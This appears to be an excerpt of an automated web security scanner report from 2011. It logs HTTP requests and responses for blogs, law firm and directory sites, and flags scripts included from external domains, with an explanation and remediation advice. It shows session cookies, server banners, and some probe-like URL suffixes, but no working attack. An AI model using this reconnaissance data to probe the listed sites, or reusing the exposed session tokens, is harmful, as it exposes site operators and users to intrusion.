User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:28 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 47923
Request
GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:07 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207116
Request
GET /?utm_source=horaextra.org&utm_medium=affiliate&utm_content=textlink&utm_campaign=horaextra HTTP/1.1
Host: gc.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:14 GMT
Server: Apache/2.2.10 (CentOS)
X-Pingback: http://gc.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105465
Para ficar por dentro das datas dos pr..ximos encontros, cadastre-se na <a href="http://groups.google.com/group/dojo_sp/" onclick="urchinTracker('/outgoing/groups.google.com/group/dojo_sp/?referer=');">lista de e-mails do grupo</a> ...[SNIP]... <p>H.. uns dois meses estava eu numa madrugada t..pica brincado de escrever c..digos aleat..rios, dessa vez usando o <a href="http://code.google.com/appengine/" onclick="urchinTracker('/outgoing/code.google.com/appengine/?referer=');">Google App Engine</a> ...[SNIP]... </strong> demais) fiquei t..o empolgado que soltei um daqueles posts meio aleat..rios no <a href="http://twitter.com" onclick="urchinTracker('/outgoing/twitter.com?referer=');">Twitter</a> ...[SNIP]... <i>“<a href="http://twitter.com/gchapiewski/status/12489805973" onclick="urchinTracker('/outgoing/twitter.com/gchapiewski/status/12489805973?referer=');">Google App Engine kicks serious ass!</a> ...[SNIP]... </i>. Muita gente estranhou, incluindo o meu amigo <a href="http://www.kumpera.net/blog/" onclick="urchinTracker('/outgoing/www.kumpera.net/blog/?referer=');">Rodrigo Kumpera</a> ...[SNIP]... <i>“<a href="http://twitter.com/kumpera/status/12498606245" onclick="urchinTracker('/outgoing/twitter.com/kumpera/status/12498606245?referer=');">@gchapiewski I thought you used to work for yahoo!</a> ...[SNIP]... </a> que fizemos em S..o Paulo em mar..o. Muitas pessoas acharam estranho e ficaram abismadas pelo fato do <a href="http://yahoo.com" onclick="urchinTracker('/outgoing/yahoo.com?referer=');">Yahoo!</a> e seus funcion..rios mostrarem hacks que faziam uso de <a href="http://maps.google.com" onclick="urchinTracker('/outgoing/maps.google.com?referer=');">Google Maps</a>, <a href="http://twitter.com" onclick="urchinTracker('/outgoing/twitter.com?referer=');">Twitter</a>, <a href="http://facebook.com" onclick="urchinTracker('/outgoing/facebook.com?referer=');">Facebook</a> ...[SNIP]... 
blog.br/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> Agora que eu trabalho no Yahoo! tenho que usar Y! Mail ao inv..s de Gmail? Ou ent..o tenho que programar usando apenas <a href="http://developer.yahoo.com/yui/" onclick="urchinTracker('/outgoing/developer.yahoo.com/yui/?referer=');">YUI</a> ao inv..s de <a href="http://jquery.com" onclick="urchinTracker('/outgoing/jquery.com?referer=');">jQuery</a> ...[SNIP]... </a>, mas n..o .. o que eu acredito. N..o me importo de usar <a href="http://java.sun.com" onclick="urchinTracker('/outgoing/java.sun.com?referer=');">Java</a> se for a melhor op....o para resolver meus problemas – apesar de adorar programar em <a href="http://www.ruby-lang.org" onclick="urchinTracker('/outgoing/www.ruby-lang.org?referer=');">Ruby</a>. Ou de aprender uma nova linguagem/ferramenta se ela se mostrar melhor para resolver alguma coisa (como quando eu precisei aprender <a href="http://www.actionscript.org" onclick="urchinTracker('/outgoing/www.actionscript.org?referer=');">ActionScript</a> para fazer coisas legais para o <a href="http://video.globo.com" onclick="urchinTracker('/outgoing/video.globo.com?referer=');">Globo V..deos</a> – apesar de eu nunca ter tido simpatia por <a href="http://www.adobe.com/products/flashplayer/" onclick="urchinTracker('/outgoing/www.adobe.com/products/flashplayer/?referer=');">Flash</a> ...[SNIP]... o profissional baseado em fatos e dados, n..o em prefer..ncias, traumas ou qualquer outro argumento sem l..gica. No caso que comecei a contar no in..cio desse post, eu estava programando um webservice <a href="http://en.wikipedia.org/wiki/Representational_State_Transfer" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Representational_State_Transfer?referer=');">REST</a> em <a href="http://python.org" onclick="urchinTracker('/outgoing/python.org?referer=');">Python</a> ...[SNIP]... <p>Veja s.., eu n..o acordo todo dia e vou para o trabalho s.. 
porque quero ganhar dinheiro ou porque sou obrigado a fazer isso. N..o fico <a href="http://twitter.com/gchapiewski/status/16757477472" onclick="urchinTracker('/outgoing/twitter.com/gchapiewski/status/16757477472?referer=');">at.. as 5 horas da manh.. hackeando as “entranhas” do Rhino com Java</a> ...[SNIP]... <param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=10713842&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=00ADEF&fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=10713842&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=00ADEF&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="450" height="253"></embed> ...[SNIP]... </param><embed src="http://www.youtube.com/v/mIP4GLhtucI&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="450" height="360"></embed> ...[SNIP]... <p>As fotos oficiais do evento est..o dispon..veis no <a href="http://www.flickr.com/photos/brhackday" onclick="urchinTracker('/outgoing/www.flickr.com/photos/brhackday?referer=');">nosso Flickr</a>. Temos tamb..m fotos tiradas pelos participantes <a href="http://www.flickr.com/groups/brhackday/pool/" onclick="urchinTracker('/outgoing/www.flickr.com/groups/brhackday/pool/?referer=');">no grupo “brhackday” do Flickr</a> ...[SNIP]... <div class="textwidget"><a rel="license" href="http://creativecommons.org/licenses/by/2.5/br/" onclick="urchinTracker('/outgoing/creativecommons.org/licenses/by/2.5/br/?referer=');"><img alt="Creative Commons License" style="border-width:0" src="http://creativecommons.org/images/public/somerights20.png" /></a> ...[SNIP]... 
</span> by <a xmlns:cc="http://creativecommons.org/ns#" href="http://guilherme.pro" property="cc:attributionName" rel="cc:attributionURL" onclick="urchinTracker('/outgoing/guilherme.pro?referer=');">Guilherme Chapiewski</a> está licenciado sob uma <a rel="license" href="http://creativecommons.org/licenses/by/2.5/br/" onclick="urchinTracker('/outgoing/creativecommons.org/licenses/by/2.5/br/?referer=');">Creative Commons Attribution 2.5 Brazil License</a> ...[SNIP]... <li><a href="http://m.artins.net" onclick="urchinTracker('/outgoing/m.artins.net?referer=');">Alexandre Martins Nunes</a> ...[SNIP]... <li><a href="http://anselmoalves.com" onclick="urchinTracker('/outgoing/anselmoalves.com?referer=');">Anselmo Alves</a> ...[SNIP]... <li><a href="http://acarlos.com.br/blog" onclick="urchinTracker('/outgoing/acarlos.com.br/blog?referer=');">Antonio Carlos Silveira</a> ...[SNIP]... <li><a href="http://blog.caelum.com.br" onclick="urchinTracker('/outgoing/blog.caelum.com.br?referer=');">Caelum</a></li> <li><a href="http://lixo.org" onclick="urchinTracker('/outgoing/lixo.org?referer=');">Carlos Villela</a> ...[SNIP]... <li><a href="http://bardusco.wordpress.com" onclick="urchinTracker('/outgoing/bardusco.wordpress.com?referer=');">Danilo Bardusco</a> ...[SNIP]... <li><a href="http://dtsato.com/blog/default" onclick="urchinTracker('/outgoing/dtsato.com/blog/default?referer=');">Danilo Sato</a> ...[SNIP]... <li><a href="http://plentz.org" onclick="urchinTracker('/outgoing/plentz.org?referer=');">Diego Pires Plentz</a> ...[SNIP]... <li><a href="http://akitaonrails.com" onclick="urchinTracker('/outgoing/akitaonrails.com?referer=');">Fabio Akita</a> ...[SNIP]... <li><a href="http://fabiokung.com" onclick="urchinTracker('/outgoing/fabiokung.com?referer=');">Fabio Kung</a> ...[SNIP]... <li><a href="http://guilherme.pro" onclick="urchinTracker('/outgoing/guilherme.pro?referer=');">Guilherme Chapiewski (en-US)</a> ...[SNIP]... 
<li><a href="http://gcirne.wordpress.com" onclick="urchinTracker('/outgoing/gcirne.wordpress.com?referer=');">Guilherme Cirne</a> ...[SNIP]... <li><a href="http://henriquebastos.net" onclick="urchinTracker('/outgoing/henriquebastos.net?referer=');">Henrique Bastos</a> ...[SNIP]... <li><a href="http://tapajos.me" onclick="urchinTracker('/outgoing/tapajos.me?referer=');">Marcos Tapaj..s</a> ...[SNIP]... <li><a href="http://www.fragmental.com.br" onclick="urchinTracker('/outgoing/www.fragmental.com.br?referer=');">Phillip Cal..ado</a> ...[SNIP]... <li><a href="http://blog.aspercom.com.br" onclick="urchinTracker('/outgoing/blog.aspercom.com.br?referer=');">Rodrigo Yoshima</a> ...[SNIP]... <li><a href="http://blog.improveit.com.br" onclick="urchinTracker('/outgoing/blog.improveit.com.br?referer=');">Vin..cius Manh..es Teles</a> ...[SNIP]... <p><script src="http://widgets.twimg.com/j/1/widget.js"></script></p> <link href="http://widgets.twimg.com/j/1/widget.css" type="text/css" rel="stylesheet"> <script> ...[SNIP]... <div class="textwidget"><script type="text/javascript" src="http://www.google.com/reader/ui/publisher-en.js"></script> <script type="text/javascript" src="http://www.google.com/reader/public/javascript/user/13324626892444451583/state/com.google/broadcast?n=10&callback=GRC_p(%7Bc%3A%22blue%22%2Ct%3A%22%22%2Cs%3A%22false%22%2Cb%3A%22false%22%7D)%3Bnew%20GRC"></script> ...[SNIP]... </div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script> ...[SNIP]... <p> Guilherme Chapiewski is proudly powered by <a href="http://wordpress.org/" onclick="urchinTracker('/outgoing/wordpress.org/?referer=');">WordPress</a> ...[SNIP]... <!-- Gorgeous design by Michael Heilemann - http://binarybonsai.com/kubrick/ -->
GET /event-log-analysis-sm/?adv=69&loc=727&client=ca-dp-sphere_related_xml HTTP/1.1 Host: landesm.gfi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Event log analysis & management</title>
GET /config/login?.src=fpctx&logout=1&r= HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:21 GMT Set-Cookie: B=76otfft6jea6h&b=3&s=5d; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com Set-Cookie: Y=%2e; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com Set-Cookie: T=z=0; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.yahoo.com Set-Cookie: SSL=%2e; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.yahoo.com; secure P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 18382
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<p style="text-align: center"><a href="http://beonthe.net" title="Tenha seu site em 24h com o Be on the Net"> <img src="http://beonthe.net/accounts/beonthe.net/images/tenha_site_beonthenet_160x55.png" alt="Crie um site em 24h com o Be on the Net" title="Tenha seu site em 24h com o Be on the Net" /> </a></p>
<p style="text-align: center"><a href="http://bigbangcafe.net/" title="Apaixonados por camisetas originais, criativas e de qualidade"> <img src="http://rafael.adm.br/wp-content/uploads/2009/12/bbcafe_tees.png" alt="Apaixonados por camisetas originais, criativas e de qualidade" title="Apaixonados por camisetas originais, criativas e ...[SNIP]... <span class="menu"> | Powered by <a href="http://wordpress.org/">WordPress</a> ...[SNIP]... <p><a href="http://woothemes.com" title="WooThemes"><img src="http://rafael.adm.br/wp-content/themes/mainstream/images/woothemes.png" alt="WooThemes Logo" /> ...[SNIP]... </script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cYiTaGq0mr37xaadbiUzgI&s=160...=pb"></script> ...[SNIP]... </script> <script src="http://cdn.wibiya.com/Toolbars/dir_0009/Toolbar_9298/Loader_9298.js" type="text/javascript"></script> <script type="text/javascript" id="navegg" src="http://lt.navegg.com/lt.js?12596"></script> ...[SNIP]...
<title>Skadden - SEC Enforcement and Compliance</title>
<link href="scripts/skadden_mini.css" rel="styl ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-224.htm" target="_blank">SEC Charges Steven Rattner in Pay-to-Play Scheme Involving New York State Pension Fund</a> ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-225.htm" target="_blank">SEC Charges Former Madoff Employees with Fraud</a> ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-223.htm" target="_blank">SEC Charges New York Firms and Chief Compliance Officer for Inadequate Procedures to Protect Nonpublic Information</a> ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-220.htm" target="_blank">SEC Brings Additional Charges in Its Ongoing Investigations Into Two Insider Trading Rings</a> ...[SNIP]... <td><a href="http://www.finra.org/Newsroom/NewsReleases/2010/P122416" target="_blank">FINRA Fines Goldman Sachs $650,000 for Failing to Disclose Wells Notices</a> ...[SNIP]... <td><a href="http://www.sec.gov/news/press/2010/2010-214.htm" target="_blank">SEC Charges Seven Oil Services and Freight Forwarding Companies for Widespread Bribery of Customs Officials</a> ...[SNIP]...
GET /domainserve/domainView?dn=testdomain123.com/?popunder=1 HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /events.cfm?id=670&action=view HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Natural Resource Damages: The Ground, Groundwater an ...[SNIP]... <p> <a href="http://www.lawseminars.com/detail.php?SeminarCode=11NRDFL" target="_blank">View Event Website</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.itunes.com/podcast?id=378831191
Request
GET /multimedia.cfm?action=view&id=674&t=event HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:26:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - WEBCAST: Implications of the Dodd-Frank Act for Non- ...[SNIP]... <div class="formrow"> <a href="http://www.itunes.com/podcast?id=378831191"><img src="http://www.arnoldporter.com//images/iTunesButton.jpg" width="77" align="bottom" height="23" border="0" alt="Listen in iTunes" /> ...[SNIP]...
GET /publications.cfm?id=2795&action=view HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Trade mark owner can object to resale of 'perfume te ...[SNIP]... <p> <a href="http://jeclap.oxfordjournals.org/content/early/2010/10/21/jeclap.lpq062.full.pdf?ijkey=susEWMn9zEmLtCQ&keytype=ref" target="_blank">View Publication (URL)</a> ...[SNIP]...
GET /chamber/memberDetail.asp?763 HTTP/1.1 Host: www.dcchamber.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:47:49 GMT Server: Apache/2.0.63 (Red Hat) Set-Cookie: PHPSESSID=5vkrrjg7cv37iiacajq7gu3jm0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]... </script>
The response contains the following links to other domains:
http://www.e-classifieds.net/
http://www.hagenhosting.com/
http://www.hagensoftware.com/
Request
GET /cgi-bin/calendar/calendar.cgi?session_key=&search_and_display_db_button=on&day=19&month=1&year=2011&results_format=headlines&query=date_search HTTP/1.1 Host: www.dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Date: Wed, 19 Jan 2011 15:48:03 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head> <title>Temporarily Unavailable</title> <meta http-equiv= ...[SNIP]... <td align="right"><a href="http://www.e-classifieds.net"><img src="http://www.dcregistry.com/graphics/eclassbanner.gif" width="468" height="60" border="1" align="middle" title="Classifieds for every website!" alt="banner" /> ...[SNIP]... </a>|<a href="http://www.hagenhosting.com" target="_top">Web Hosting</a> ...[SNIP]... <td class="regalt" align="center"><a href="http://www.hagenhosting.com"><img alt="Hagen Hosting" width="305" height="44" title="Hagen Hosting: Premium quality web hosting" src="http://www.dcregistry.com/graphics/test3.gif" border="1" /> ...[SNIP]... <font class="reg"><a href="http://www.hagenhosting.com"><img src="http://www.dcregistry.com/graphics/hagen_small2.gif" width="130" height="56" border="1" alt="Premium quality web hosting!" title="Premium quality web hosting!" /> ...[SNIP]... <br /> <a href="http://www.hagenhosting.com">Premium quality web hosting!</a> ...[SNIP]... <p><a href="http://www.hagenhosting.com"><img src="http://www.dcregistry.com/graphics/hagen_small2.gif" border="1" alt="Premium quality web hosting!" width="130" height="56" title="Premium quality web hosting!" /> ...[SNIP]... <br /> <a href="http://www.hagenhosting.com">Premium quality web hosting!</a> ...[SNIP]... <font class="small"><a href="http://www.e-classifieds.net"><img src="http://www.dcregistry.com/graphics/eclassbanner.gif" width="468" height="60" border="1" align="middle" title="Classifieds for every website!" alt="banner" /> ...[SNIP]... <br /> <a href="http://www.e-classifieds.net">Classifieds for every website!</a> ...[SNIP]... </script> <a href="http://www.hagensoftware.com">Hagen Software</a> ...[SNIP]...
The response contains the following links to other domains:
http://www.e-classifieds.net/
http://www.hagenhosting.com/
http://www.hagensoftware.com/
Request
GET /cgi-bin/classifieds/classifieds.cgi?db=rentals HTTP/1.1 Host: www.dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:47:56 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 57980
GET /showoffice.aspx?Show=542 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... </script>
<a href="http://www.litigationtrends.com"> <img src="/img/banners/ribbon/Ribbon.jpg" alt="" height="45" width="750" border="0" /> ...[SNIP]... </strong> an independent news organization that focuses on the inner workings of the U.S. Department of Justice, the Attorney General Office, U.S. Attorney news and <a href="http://www.mainjustice.com/justanti-corruption-a-new-site-from-main-justice/">white-collar crime, corruption and compliance law</a> ...[SNIP]... <td align="center" bordercolor="#DDD1C3">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
GET /washington%20dc%20law%20firms?cb=27&cmp=3917/x22 HTTP/1.1 Host: www.info.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response contains the following link to another domain:
http://www.google-analytics.com/urchin.js
Request
GET /2011insights.cfm?contentID=52 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D52;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]... </script>
The response contains the following link to another domain:
http://www.google-analytics.com/urchin.js
Request
GET /alumni/Index.cfm?contentID=7 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: BACKLINK=%2CcontentID%3D7;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]... <!-- end border table -->
The response contains the following link to another domain:
http://www.google-analytics.com/urchin.js
Request
GET /index.cfm?contentID=42&itemID=1478 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
GET /gypr.aspx?afid=1993&cc=5411105100&cr=3209505169&ct=Washington/x22 HTTP/1.1 Host: www.usdirectory.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:09:38 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:09:38 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]... <body>
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </script>
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET / HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:08:07 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Wed, 19 Jan 2011 16:24:14 +0000 Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 207203
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... </script><script type="text/javascript" id="topsy-js-elem" src="http://cdn.topsy.com/topsy.js?init=topsyWidgetCreator"></script> ...[SNIP]...
GET /tools/ HTTP/1.1 Host: flowplayer.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
